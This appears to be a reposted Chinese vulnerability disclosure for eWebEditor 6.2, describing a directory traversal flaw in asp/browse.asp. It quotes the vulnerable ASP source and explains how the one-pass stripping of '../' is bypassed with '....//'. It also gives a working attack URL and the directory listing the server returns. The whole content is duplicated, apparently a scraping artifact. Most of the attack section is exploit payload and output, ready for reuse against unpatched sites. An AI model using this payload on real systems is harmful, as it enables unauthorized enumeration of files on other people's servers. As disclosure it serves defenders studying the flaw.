eWebEditor 6.2 目录遍历漏洞(asp/browse.asp)
程序员文章站
2024-01-11 08:07:10
最新eWebEditor 6.2版本存在目录遍历漏洞,漏洞页面asp/browse.asp,可通过漏洞遍里特定目录下的所有文件列表.
... 10-05-13...
asp/browse.asp部分源码:
dim s_returnflag, s_foldertype, s_dir
dim s_currdir
s_returnflag = trim(request.querystring("returnflag"))
s_foldertype = trim(request.querystring("foldertype"))
s_dir = trim(request("dir"))
select case s_foldertype
case "upload"
s_currdir = suploaddir
case "shareimage"
sallowext = ""
s_currdir = spathshareimage
case "shareflash"
sallowext = ""
s_currdir = spathshareflash
case "sharemedia"
sallowext = ""
s_currdir = spathsharemedia
case else
s_foldertype = "shareother"
sallowext = ""
s_currdir = spathshareother
end select
s_dir = replace(s_dir, "\", "/")
'下面两行是对目录跳转的处理,漏洞存在于此处
s_dir = replace(s_dir, "../", "") '替换../为空
s_dir = replace(s_dir, "./", "") '替换./为空
if left(s_dir,1)="/" then
s_dir = ""
end if
dim s_dir2
s_dir2 = replace(s_dir, "/", "\")
if s_dir <> "" then
if checkvaliddir(s_currdir & s_dir2) = true then
s_currdir = s_currdir & s_dir2
else
s_dir = ""
end if
end if
代码对../和./进行过滤用来防止目录跳转,但可以通过构造参数饶过检测.由于检测替换只进行一次可以使用....//代替上级目录,程序替换后....//变成../
攻击代码示例:
http://localhost/asp/browse.asp?action=file&type=file&dir=.....///dialog&style=full650&cusdir=&foldertype=upload&returnflag=span_upload
跳转到上ewebeditor的dialog目录,查看返回页面的源文件:
<html><head><meta http-equiv='content-type' content='text/html; charset=gb2312'><title>ewebeditor</title></head><body><script language=javascript>var arr = new array();
arr[0]=new array("about.htm", "1.85 kb","2009-05-29 16:27:06");
arr[1]=new array("anchor.htm", "3.68 kb","2009-05-13 16:39:40");
arr[2]=new array("art.htm", "49.55 kb","2009-05-13 16:39:40");
arr[3]=new array("backimage.htm", "9.46 kb","2009-05-13 16:39:42");
arr[4]=new array("browse.htm", "20.74 kb","2009-05-13 16:39:42");
arr[5]=new array("dialog.js", "6.44 kb","2009-05-13 22:39:08");
arr[6]=new array("emot.htm", "3.26 kb","2009-05-13 16:39:42");
arr[7]=new array("eq.htm", "3.48 kb","2009-05-14 00:02:20");
arr[8]=new array("ewebeditoractivex.cab", "1118.08 kb","2009-05-14 00:18:40");
arr[9]=new array("ewebeditoractivexinstall.exe", "1190.72 kb","2009-04-11 23:12:48");
arr[10]=new array("fieldset.htm", "4.11 kb","2009-05-13 16:39:42");
arr[11]=new array("file.htm", "5.52 kb","2009-05-13 16:39:42");
arr[12]=new array("findreplace.htm", "2.82 kb","2009-05-13 16:39:42");
arr[13]=new array("flash.htm", "14.43 kb","2009-05-13 16:39:42");
arr[14]=new array("fullscreen.htm", "0.84 kb","2009-05-13 16:39:42");
arr[15]=new array("hyperlink.htm", "4.43 kb","2009-05-13 16:39:42");
arr[16]=new array("iframe.htm", "4.24 kb","2009-05-14 00:31:30");
arr[17]=new array("img.htm", "13.25 kb","2009-05-13 16:39:42");
arr[18]=new array("importexcel.htm", "5.87 kb","2009-05-13 16:39:42");
arr[19]=new array("importword.htm", "8.44 kb","2009-05-13 16:39:42");
arr[20]=new array("installactivex.htm", "2.02 kb","2009-05-13 16:39:42");
arr[21]=new array("i_upload.htm", "7.95 kb","2009-05-13 22:41:40");
arr[22]=new array("map.htm", "4.13 kb","2009-05-13 16:39:42");
arr[23]=new array("marquee.htm", "2.44 kb","2009-05-13 16:39:42");
arr[24]=new array("media.htm", "5.07 kb","2009-05-13 16:39:42");
arr[25]=new array("owcexcel.htm", "2.64 kb","2009-05-13 16:39:42");
arr[26]=new array("paragraph.htm", "5.95 kb","2009-05-13 16:39:42");
arr[27]=new array("paste.htm", "4.50 kb","2009-05-13 16:39:42");
arr[28]=new array("quickformat.htm", "13.58 kb","2009-05-13 16:39:42");
arr[29]=new array("selcolor.htm", "14.93 kb","2009-05-13 16:39:42");
arr[30]=new array("symbol.htm", "14.61 kb","2009-05-13 16:39:42");
arr[31]=new array("table.htm", "11.71 kb","2009-05-13 16:39:42");
arr[32]=new array("tablecell.htm", "7.98 kb","2009-05-13 16:39:42");
arr[33]=new array("tablecellsplit.htm", "2.55 kb","2009-05-13 16:39:42");
arr[34]=new array("template.htm", "4.50 kb","2009-05-13 16:39:42");
arr[35]=new array("webeqinstall.cab", "1123.39 kb","2009-05-14 00:16:16");
parent.setfilelist('span_upload', 'upload', '../dialog', arr);</script></body></html>
复制代码
代码如下:dim s_returnflag, s_foldertype, s_dir
dim s_currdir
s_returnflag = trim(request.querystring("returnflag"))
s_foldertype = trim(request.querystring("foldertype"))
s_dir = trim(request("dir"))
select case s_foldertype
case "upload"
s_currdir = suploaddir
case "shareimage"
sallowext = ""
s_currdir = spathshareimage
case "shareflash"
sallowext = ""
s_currdir = spathshareflash
case "sharemedia"
sallowext = ""
s_currdir = spathsharemedia
case else
s_foldertype = "shareother"
sallowext = ""
s_currdir = spathshareother
end select
s_dir = replace(s_dir, "\", "/")
'下面两行是对目录跳转的处理,漏洞存在于此处
s_dir = replace(s_dir, "../", "") '替换../为空
s_dir = replace(s_dir, "./", "") '替换./为空
if left(s_dir,1)="/" then
s_dir = ""
end if
dim s_dir2
s_dir2 = replace(s_dir, "/", "\")
if s_dir <> "" then
if checkvaliddir(s_currdir & s_dir2) = true then
s_currdir = s_currdir & s_dir2
else
s_dir = ""
end if
end if
代码对../和./进行过滤用来防止目录跳转,但可以通过构造参数饶过检测.由于检测替换只进行一次可以使用....//代替上级目录,程序替换后....//变成../
攻击代码示例:
http://localhost/asp/browse.asp?action=file&type=file&dir=.....///dialog&style=full650&cusdir=&foldertype=upload&returnflag=span_upload
跳转到上ewebeditor的dialog目录,查看返回页面的源文件:
复制代码
代码如下:<html><head><meta http-equiv='content-type' content='text/html; charset=gb2312'><title>ewebeditor</title></head><body><script language=javascript>var arr = new array();
arr[0]=new array("about.htm", "1.85 kb","2009-05-29 16:27:06");
arr[1]=new array("anchor.htm", "3.68 kb","2009-05-13 16:39:40");
arr[2]=new array("art.htm", "49.55 kb","2009-05-13 16:39:40");
arr[3]=new array("backimage.htm", "9.46 kb","2009-05-13 16:39:42");
arr[4]=new array("browse.htm", "20.74 kb","2009-05-13 16:39:42");
arr[5]=new array("dialog.js", "6.44 kb","2009-05-13 22:39:08");
arr[6]=new array("emot.htm", "3.26 kb","2009-05-13 16:39:42");
arr[7]=new array("eq.htm", "3.48 kb","2009-05-14 00:02:20");
arr[8]=new array("ewebeditoractivex.cab", "1118.08 kb","2009-05-14 00:18:40");
arr[9]=new array("ewebeditoractivexinstall.exe", "1190.72 kb","2009-04-11 23:12:48");
arr[10]=new array("fieldset.htm", "4.11 kb","2009-05-13 16:39:42");
arr[11]=new array("file.htm", "5.52 kb","2009-05-13 16:39:42");
arr[12]=new array("findreplace.htm", "2.82 kb","2009-05-13 16:39:42");
arr[13]=new array("flash.htm", "14.43 kb","2009-05-13 16:39:42");
arr[14]=new array("fullscreen.htm", "0.84 kb","2009-05-13 16:39:42");
arr[15]=new array("hyperlink.htm", "4.43 kb","2009-05-13 16:39:42");
arr[16]=new array("iframe.htm", "4.24 kb","2009-05-14 00:31:30");
arr[17]=new array("img.htm", "13.25 kb","2009-05-13 16:39:42");
arr[18]=new array("importexcel.htm", "5.87 kb","2009-05-13 16:39:42");
arr[19]=new array("importword.htm", "8.44 kb","2009-05-13 16:39:42");
arr[20]=new array("installactivex.htm", "2.02 kb","2009-05-13 16:39:42");
arr[21]=new array("i_upload.htm", "7.95 kb","2009-05-13 22:41:40");
arr[22]=new array("map.htm", "4.13 kb","2009-05-13 16:39:42");
arr[23]=new array("marquee.htm", "2.44 kb","2009-05-13 16:39:42");
arr[24]=new array("media.htm", "5.07 kb","2009-05-13 16:39:42");
arr[25]=new array("owcexcel.htm", "2.64 kb","2009-05-13 16:39:42");
arr[26]=new array("paragraph.htm", "5.95 kb","2009-05-13 16:39:42");
arr[27]=new array("paste.htm", "4.50 kb","2009-05-13 16:39:42");
arr[28]=new array("quickformat.htm", "13.58 kb","2009-05-13 16:39:42");
arr[29]=new array("selcolor.htm", "14.93 kb","2009-05-13 16:39:42");
arr[30]=new array("symbol.htm", "14.61 kb","2009-05-13 16:39:42");
arr[31]=new array("table.htm", "11.71 kb","2009-05-13 16:39:42");
arr[32]=new array("tablecell.htm", "7.98 kb","2009-05-13 16:39:42");
arr[33]=new array("tablecellsplit.htm", "2.55 kb","2009-05-13 16:39:42");
arr[34]=new array("template.htm", "4.50 kb","2009-05-13 16:39:42");
arr[35]=new array("webeqinstall.cab", "1123.39 kb","2009-05-14 00:16:16");
parent.setfilelist('span_upload', 'upload', '../dialog', arr);</script></body></html>